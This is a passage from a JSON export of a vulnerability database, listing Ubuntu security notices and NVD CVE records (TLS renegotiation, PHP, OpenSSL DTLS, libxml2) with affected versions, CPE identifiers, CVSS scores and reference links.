"packageName": "apache2.2-common", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.0.55-4ubuntu2.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-common", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.2.12-1ubuntu2.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2.2-common", "operator": "lt"}], "description": "USN-860-1 introduced a partial workaround to Apache that disabled client initiated TLS renegotiation in order to mitigate CVE-2009-3555. USN-990-1 introduced the new RFC5746 renegotiation extension in openssl, and completely resolves the issue.\n\nAfter updating openssl, an Apache server will allow both patched and unpatched web browsers to connect, but unpatched browsers will not be able to renegotiate. This update introduces the new SSLInsecureRenegotiation directive for Apache that may be used to re-enable insecure renegotiations with unpatched web browsers. For more information, please refer to: <http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslinsecurerenegotiation>\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user\u2019s session. This update adds backported support for the new RFC5746 renegotiation extension and will use it when both the client and the server support it.", "edition": 3, "reporter": "Ubuntu", "published": "2010-09-21T00:00:00", "title": "Apache vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "modified": "2010-09-21T00:00:00", "id": "USN-990-2", "href": "https://usn.ubuntu.com/990-2/", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:09:20", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3555"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "3.12.6-0ubuntu0.9.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libnss3-1d", "operator": "lt"}], "description": "Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user\u2019s session. This update adds support for the new new renegotiation extension and will use it when the server supports it.", "edition": 3, "reporter": "Ubuntu", "published": "2010-04-09T00:00:00", "title": "NSS vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "modified": "2010-04-09T00:00:00", "id": "USN-927-1", "href": "https://usn.ubuntu.com/927-1/", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-10-12T11:33:48", "references": ["http://bugs.php.net/bug.php?id=45722", "http://cvs.php.net/viewvc.cgi/php-src/ext/mbstring/libmbfl/filters/mbfilter_htmlent.c?r1=1.7&r2=1.8", "http://www.us-cert.gov/cas/techalerts/TA09-133A.html", "http://www.securityfocus.com/bid/32948", "http://archives.neohapsis.com/archives/fulldisclosure/2008-12/0477.html", "https://www.redhat.com/archives/fedora-package-announce/2009-May/msg01451.html", "http://www.php.net/ChangeLog-5.php#5.2.7", "http://lists.apple.com/archives/security-announce/2009/May/msg00002.html", "http://marc.info/?l=bugtraq&m=124654546101607&w=2", "http://www.redhat.com/support/errata/RHSA-2009-0350.html", "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00003.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2009:045", "https://www.redhat.com/archives/fedora-package-announce/2009-May/msg01465.html", "http://securitytracker.com/id?1021482", "http://www.debian.org/security/2009/dsa-1789", "http://support.apple.com/kb/HT3549", "http://wiki.rpath.com/Advisories:rPSA-2009-0035", "http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html", "http://marc.info/?l=bugtraq&m=125631037611762&w=2", "http://www.vupen.com/english/advisories/2009/1297", "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02029444", "https://exchange.xforce.ibmcloud.com/vulnerabilities/47525", "http://www.securityfocus.com/archive/1/501376/100/0/threaded"], "description": "Heap-based buffer overflow in ext/mbstring/libmbfl/filters/mbfilter_htmlent.c in the mbstring extension in PHP 4.3.0 through 5.2.6 allows context-dependent attackers to execute arbitrary code via a crafted string containing an HTML entity, which is not properly handled during Unicode conversion, related to the (1) mb_convert_encoding, (2) mb_check_encoding, (3) mb_convert_variables, and (4) mb_parse_str functions.", "edition": 4, "reporter": "NVD", "published": "2008-12-23T13:30:03", "title": "CVE-2008-5557", "type": "cve", "enchantments": {"score": {"modified": "2018-10-12T11:33:48", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10286", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10286"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-5557"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10286", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10286"}], "modified": "2018-10-11T16:56:04", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.0.0:rc1", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:5.0.0:beta3", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.0.0:beta1", "cpe:/a:php:php:5.0.0:rc3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.0.0:beta4", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:5.0.0:beta2", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.0.0:rc2"], "id": "CVE-2008-5557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5557", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T13:40:15", "references": ["http://securitytracker.com/id?1023909"], "edition": 1, "description": "Unspecified vulnerability in HP System Management Homepage (SMH) 6.0 before 6.0.0-95 on Linux, and 6.0 before 6.0.0.96 on Windows, allows remote authenticated users to obtain sensitive information, modify data, and cause a denial of service via unknown vectors.", "reporter": "NVD", "published": "2010-04-23T10:30:01", "type": "cve", "title": "CVE-2010-1034", "enchantments": {"score": {"modified": "2016-09-03T13:40:15", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-1034"], "scanner": [], "modified": "2012-03-19T00:00:00", "cpe": ["cpe:/a:hp:system_management_homepage:6.0"], "id": "CVE-2010-1034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1034", "cvss": {"score": 4.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-08T11:24:34", "references": ["https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00654.html", "http://marc.info/?l=bugtraq&m=127239985506823&w=2", "http://lists.opensuse.org/opensuse-security-announce/2008-08/msg00006.html", "http://www.securityfocus.com/bid/28380", "https://exchange.xforce.ibmcloud.com/vulnerabilities/41360", "http://jvn.jp/jp/JVN%2300892830/index.html", "http://www.namazu.org/security.html.en", "https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00575.html", "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02029444"], "description": "Cross-site scripting (XSS) vulnerability in namazu.cgi in Namazu before 2.0.18 allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input, related to failure to set the charset, a different vector than CVE-2004-1318 and CVE-2001-1350. NOTE: some of these details are obtained from third party information.", "edition": 2, "reporter": "NVD", "published": "2008-03-24T17:44:00", "title": "CVE-2008-1468", "type": "cve", "enchantments": {"score": {"modified": "2017-08-08T11:24:34", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-1468"], "scanner": [], "modified": "2017-08-07T21:30:11", "cpe": ["cpe:/a:namazu:namazu:2.0.13", "cpe:/a:namazu:namazu:2.0.12", "cpe:/a:namazu:namazu:2.0.2", "cpe:/a:namazu:namazu:1.3.0.11", "cpe:/a:namazu:namazu:2.0.17", "cpe:/a:namazu:namazu:2.0.16", "cpe:/a:namazu:namazu:2.0", "cpe:/a:namazu:namazu:2.0.14", "cpe:/a:namazu:namazu:2.0.15"], "id": "CVE-2008-1468", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1468", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-04T11:16:35", "references": ["https://usn.ubuntu.com/761-1/", "http://jvn.jp/en/jp/JVN50327700/index.html", "http://marc.info/?l=bugtraq&m=124277349419254&w=2", "http://www.vupen.com/english/advisories/2009/1338", "http://www.redhat.com/support/errata/RHSA-2009-0350.html", "http://www.debian.org/security/2009/dsa-1789", "https://exchange.xforce.ibmcloud.com/vulnerabilities/47496", "http://www.ubuntu.com/usn/USN-761-2", "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02029444", "http://jvndb.jvn.jp/en/contents/2008/JVNDB-2008-000084.html"], "description": "Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier, when display_errors is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: because of the lack of details, it is unclear whether this is related to CVE-2006-0208.", "edition": 4, "reporter": "NVD", "published": "2009-01-02T13:11:09", "title": "CVE-2008-5814", "type": "cve", "enchantments": {"score": {"modified": "2018-10-04T11:16:35", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10501", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10501"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-5814"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10501", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10501"}], "modified": "2018-10-03T17:57:36", "cpe": ["cpe:/a:php:php:5.0:rc3", "cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:4.0:beta4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.0:rc1", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:4.2.4", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:5.1", "cpe:/a:php:php:4.0.4:patch1", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:4.0:beta1", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5", "cpe:/a:php:php:4.0.7:rc3", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.0.7:rc2", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.0:rc1", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.2::dev", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:4.0.1:patch2", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.0:rc1", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:5.0.0:beta3", "cpe:/a:php:php:4.0.1:patch1", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.7:rc1", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.0:beta2", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.0:rc2", "cpe:/a:php:php:5.0.0:beta1", "cpe:/a:php:php:5.0:rc2", "cpe:/a:php:php:5.0.0:rc3", "cpe:/a:php:php:4.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.0:beta_4_patch1", "cpe:/a:php:php:4.0.7:rc4", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.1.3", "cpe:/a:php:php:4.0.3:patch1", "cpe:/a:php:php:4", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.0.0:beta4", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:5.0.0:beta2", "cpe:/a:php:php:1.0", "cpe:/a:php:php:4.0:beta3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.0.0:rc2", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6"], "id": "CVE-2008-5814", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5814", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-29T14:26:35", "references": ["http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00002.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50963", "http://www.redhat.com/support/errata/RHSA-2009-1335.html", "http://lists.vmware.com/pipermail/security-announce/2010/000082.html", "http://www.vupen.com/english/advisories/2010/0528", "http://www.openwall.com/lists/oss-security/2009/06/02/1", "http://www.securityfocus.com/bid/35174", "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-009.txt.asc", "http://www.ubuntu.com/usn/USN-792-1", "http://rt.openssl.org/Ticket/Display.html?id=1679&user=guest&pass=guest", "https://www.exploit-db.com/exploits/8873", "http://cvs.openssl.org/chngview?cn=17369", "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02029444"], "description": "ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello.", "edition": 3, "reporter": "NVD", "published": "2009-06-04T12:30:00", "title": "CVE-2009-1386", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:35", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11179", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11179"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-1386"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:7469", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:7469"}], "modified": "2017-09-28T21:34:21", "cpe": ["cpe:/a:openssl_project:openssl:0.9.8d-2", "cpe:/a:openssl_project:openssl:0.9.8c-8", "cpe:/a:openssl_project:openssl:0.9.8f-7", "cpe:/a:openssl:openssl:0.9.6e", "cpe:/a:openssl:openssl:0.9.7:beta3", "cpe:/a:openssl:openssl:0.9.8b", "cpe:/a:openssl:openssl:0.9.8h", "cpe:/a:redhat:openssl:0.9.7a-2", "cpe:/a:openssl_project:openssl:0.9.8g-4", "cpe:/a:openssl:openssl:0.9.5a:beta1", "cpe:/a:openssl_project:openssl:0.9.8g-5", "cpe:/a:openssl:openssl:0.9.5a:beta2", "cpe:/a:openssl_project:openssl:0.9.8g-2", "cpe:/a:openssl:openssl:0.9.7:beta6", "cpe:/a:openssl:openssl:0.9.3a", "cpe:/a:openssl_project:openssl:0.9.8g-8", "cpe:/a:openssl:openssl:0.9.6a:beta1", "cpe:/a:openssl_project:openssl:0.9.8f-3", "cpe:/a:openssl:openssl:0.9.7:beta2", "cpe:/a:openssl_project:openssl:0.9.8e-5", "cpe:/a:openssl:openssl:0.9.8a", "cpe:/a:redhat:openssl:0.9.6b-3", "cpe:/a:openssl_project:openssl:0.9.8f-2", "cpe:/a:openssl:openssl:0.9.7c", "cpe:/a:openssl_project:openssl:0.9.8c-3", "cpe:/a:openssl:openssl:0.9.7j", "cpe:/a:openssl:openssl:0.9.7g", "cpe:/a:openssl:openssl:0.9.7:beta5", "cpe:/a:openssl:openssl:0.9.6j", "cpe:/a:openssl_project:openssl:0.9.8f-6", "cpe:/a:openssl_project:openssl:0.9.8f-5", "cpe:/a:openssl:openssl:0.9.7a", "cpe:/a:openssl:openssl:0.9.6a:beta2", "cpe:/a:openssl:openssl:0.9.3", "cpe:/a:openssl:openssl:0.9.7m", "cpe:/a:openssl:openssl:0.9.1c", "cpe:/a:openssl:openssl:0.9.7h", "cpe:/a:openssl:openssl:0.9.6k", "cpe:/a:openssl:openssl:0.9.5a", "cpe:/a:openssl_project:openssl:0.9.8g-9", "cpe:/a:openssl:openssl:0.9.6a", "cpe:/a:openssl:openssl:0.9.7d", "cpe:/a:openssl:openssl:0.9.6:beta1", "cpe:/a:openssl_project:openssl:0.9.8g-7", "cpe:/a:redhat:openssl:0.9.7a-2::i386_dev", "cpe:/a:openssl:openssl:0.9.6h", "cpe:/a:openssl:openssl:0.9.8f", "cpe:/a:openssl:openssl:0.9.8", "cpe:/a:openssl_project:openssl:0.9.8d-7", "cpe:/a:redhat:openssl:0.9.6b-3::i386", "cpe:/a:openssl:openssl:0.9.5", "cpe:/a:openssl_project:openssl:0.9.8d-5", "cpe:/a:openssl:openssl:0.9.4", "cpe:/a:openssl:openssl:0.9.7:beta1", "cpe:/a:openssl_project:openssl:0.9.8e-2", "cpe:/a:openssl_project:openssl:0.9.8d-1", "cpe:/a:redhat:openssl:0.9.7a-2::i386", "cpe:/a:openssl_project:openssl:0.9.8e-3", "cpe:/a:openssl_project:openssl:0.9.8e-6", "cpe:/a:openssl:openssl:0.9.7f", "cpe:/a:openssl:openssl:0.9.8c", "cpe:/a:openssl_project:openssl:0.9.8f", "cpe:/a:openssl:openssl:0.9.7b", "cpe:/a:openssl_project:openssl:0.9.8d-4", "cpe:/a:openssl_project:openssl:0.9.8d-8", "cpe:/a:openssl_project:openssl:0.9.8f-9", "cpe:/a:openssl:openssl:0.9.6c", "cpe:/a:openssl_project:openssl:0.9.8e-1", "cpe:/a:openssl_project:openssl:0.9.8c-1", "cpe:/a:openssl:openssl:0.9.7l", "cpe:/a:openssl:openssl:0.9.6i", "cpe:/a:openssl_project:openssl:0.9.8c-2", "cpe:/a:openssl_project:openssl:0.9.8c-7", "cpe:/a:openssl_project:openssl:0.9.8c-6", "cpe:/a:openssl:openssl:0.9.7:beta4", "cpe:/a:openssl:openssl:0.9.6d", "cpe:/a:openssl:openssl:0.9.7i", "cpe:/a:openssl:openssl:0.9.8d", "cpe:/a:openssl_project:openssl:0.9.8c-4", "cpe:/a:openssl_project:openssl:0.9.8d-6", "cpe:/a:openssl:openssl:0.9.5:beta1", "cpe:/a:openssl_project:openssl:0.9.8g-3", "cpe:/a:redhat:openssl:0.9.6-15::i386", "cpe:/a:openssl_project:openssl:0.9.8d-3", "cpe:/a:openssl_project:openssl:0.9.8d-9", "cpe:/a:openssl_project:openssl:0.9.8e-7", "cpe:/a:openssl_project:openssl:0.9.8g-6", "cpe:/a:openssl_project:openssl:0.9.8f-4", "cpe:/a:openssl:openssl:0.9.7k", "cpe:/a:openssl_project:openssl:0.9.8g", "cpe:/a:openssl:openssl:0.9.6g", "cpe:/a:openssl:openssl:0.9.6:beta3", "cpe:/a:openssl:openssl:0.9.6m", "cpe:/a:openssl:openssl:0.9.7e", "cpe:/a:openssl:openssl:0.9.6a:beta3", "cpe:/a:openssl:openssl:0.9.6f", "cpe:/a:openssl:openssl:0.9.8e", "cpe:/a:openssl_project:openssl:0.9.8c-9", "cpe:/a:openssl:openssl:0.9.6:beta2", "cpe:/a:openssl:openssl:0.9.8g", "cpe:/a:openssl:openssl:0.9.6b", "cpe:/a:openssl_project:openssl:0.9.8f-8", "cpe:/a:openssl_project:openssl:0.9.8c-5", "cpe:/a:openssl:openssl:0.9.2b", "cpe:/a:openssl_project:openssl:0.9.8f-1", "cpe:/a:openssl_project:openssl:0.9.8g-1", "cpe:/a:openssl_project:openssl:0.9.8e-9", "cpe:/a:openssl_project:openssl:0.9.8e-4", "cpe:/a:redhat:openssl:0.9.7a-2::i386_perl", "cpe:/a:openssl:openssl:0.9.6l", "cpe:/a:openssl_project:openssl:0.9.8e-8", "cpe:/a:redhat:openssl:0.9.6-15"], "id": "CVE-2009-1386", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1386", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:26:07", "references": ["http://www.ubuntu.com/usn/usn-673-1", "http://www.vupen.com/english/advisories/2009/1522", "http://www.vupen.com/english/advisories/2009/0034", "http://www.vupen.com/english/advisories/2009/0301", "http://www.vmware.com/security/advisories/VMSA-2009-0001.html", "https://admin.fedoraproject.org/updates/libxml2-2.7.2-2.fc10", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:231", "http://security.gentoo.org/glsa/glsa-200812-06.xml", "http://www.vupen.com/english/advisories/2008/3176", "https://admin.fedoraproject.org/updates/libxml2-2.7.2-2.fc9", "https://www.redhat.com/archives/fedora-package-announce/2008-November/msg00472.html", "http://www.vupen.com/english/advisories/2009/0323", "http://securitytracker.com/id?1021238", "http://sunsolve.sun.com/search/document.do?assetkey=1-66-261688-1", "http://www.redhat.com/support/errata/RHSA-2008-0988.html", "https://bugzilla.redhat.com/show_bug.cgi?id=470466", "http://lists.opensuse.org/opensuse-security-announce/2008-11/msg00002.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-251406-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-66-265329-1", "http://support.avaya.com/elmodocs2/security/ASA-2009-002.htm", "http://support.apple.com/kb/HT3639", "http://support.apple.com/kb/HT3613", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.473974", "http://lists.apple.com/archives/security-announce/2009/Jun/msg00005.html", "http://wiki.rpath.com/Advisories:rPSA-2008-0325", "http://lists.apple.com/archives/security-announce/2009/jun/msg00002.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-21-126356-03-1", "http://support.avaya.com/elmodocs2/security/ASA-2009-067.htm", "http://sunsolve.sun.com/search/document.do?assetkey=1-21-141243-01-1", "http://www.securityfocus.com/bid/32326", "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02029444", "https://www.redhat.com/archives/fedora-package-announce/2008-November/msg00513.html", "http://www.vupen.com/english/advisories/2009/1621", "http://www.debian.org/security/2008/dsa-1666"], "description": "Integer overflow in the xmlSAX2Characters function in libxml2 2.7.2 allows context-dependent attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a large XML document.", "edition": 2, "reporter": "NVD", "published": "2008-11-25T18:30:00", "title": "CVE-2008-4226", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:07", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6219", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6219"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4226"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6360", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6360"}], "modified": "2017-09-28T21:32:03", "cpe": ["cpe:/a:xmlsoft:libxml:2.7.2"], "id": "CVE-2008-4226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4226", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-29T14:26:35", "references": ["http://cvs.openssl.org/chngview?cn=17958", "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00002.html", "http://www.redhat.com/support/errata/RHSA-2009-1335.html", "http://rt.openssl.org/Ticket/Display.html?id=1838&user=guest&pass=guest", "http://lists.vmware.com/pipermail/security-announce/2010/000082.html", "http://sourceforge.net/mailarchive/message.php?msg_name=4AD43807.7080105%40users.sourceforge.net", "http://www.vupen.com/english/advisories/2010/0528", "http://www.openwall.com/lists/oss-security/2009/06/02/1", "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-009.txt.asc", "http://www.ubuntu.com/usn/USN-792-1", "http://voodoo-circle.sourceforge.net/sa/sa-20091012-01.html", "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02029444", "http://security.gentoo.org/glsa/glsa-200912-01.xml"], "description": "The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a \"fragment bug.\"", "edition": 2, "reporter": "NVD", "published": "2009-06-04T12:30:00", "title": "CVE-2009-1387", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:35", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10740", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10740"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-1387"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10740", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10740"}], "modified": "2017-09-28T21:34:21", "cpe": ["cpe:/a:openssl_project:openssl:0.9.8d-2", "cpe:/a:openssl_project:openssl:0.9.8c-8", "cpe:/a:openssl_project:openssl:0.9.8f-7", "cpe:/a:openssl:openssl:0.9.6e", "cpe:/a:openssl:openssl:0.9.7:beta3", "cpe:/a:openssl:openssl:0.9.8b", "cpe:/a:openssl:openssl:0.9.8h", "cpe:/a:redhat:openssl:0.9.7a-2", "cpe:/a:openssl_project:openssl:0.9.8g-4", "cpe:/a:openssl:openssl:0.9.5a:beta1", "cpe:/a:openssl_project:openssl:0.9.8g-5", "cpe:/a:openssl:openssl:0.9.5a:beta2", 